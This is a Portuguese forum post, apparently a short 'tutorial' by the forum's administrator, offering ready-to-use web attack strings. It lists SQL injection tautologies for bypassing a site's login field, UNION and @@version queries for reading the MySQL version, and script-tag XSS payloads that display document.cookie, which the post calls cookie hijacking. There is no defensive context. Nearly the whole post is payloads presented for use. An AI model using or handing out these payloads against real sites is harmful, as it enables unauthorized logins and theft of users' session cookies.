[Tutorial] - Exemplo de Ataques XSS e de SQL Injection

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

[Tutorial] - Exemplo de Ataques XSS e de SQL Injection

Mensagem por SRmasazuka em Ter 23 Abr - 5:16


Exemplo de Ataques XSS e de SQL Injection
[Você precisa estar registrado e conectado para ver esta imagem.]

Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1 '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1



e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Sequestrando Cookies:

'"><script>alert('xss');alert(document.cookie)</script> ou
<script>alert('xss');alert(document.cookie)</script>


Fonte: [Você precisa estar registrado e conectado para ver este link.]
avatar
SRmasazuka
Administrator

Mensagens Mensagens : 147
MPoints MPoints : 5033
Idade Idade : 20

Ver perfil do usuário

Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum